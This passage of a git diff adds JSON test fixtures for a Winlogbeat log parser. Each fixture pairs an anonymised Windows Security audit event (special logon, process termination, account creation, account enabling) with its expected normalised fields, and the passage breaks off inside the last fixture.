864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..59c3d35b3 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json @@ -0,0 +1,82 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..e5beffcf5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json @@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..96e08b538 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json @@ -0,0 +1,127 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": "0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..94bd16fdf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json @@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account 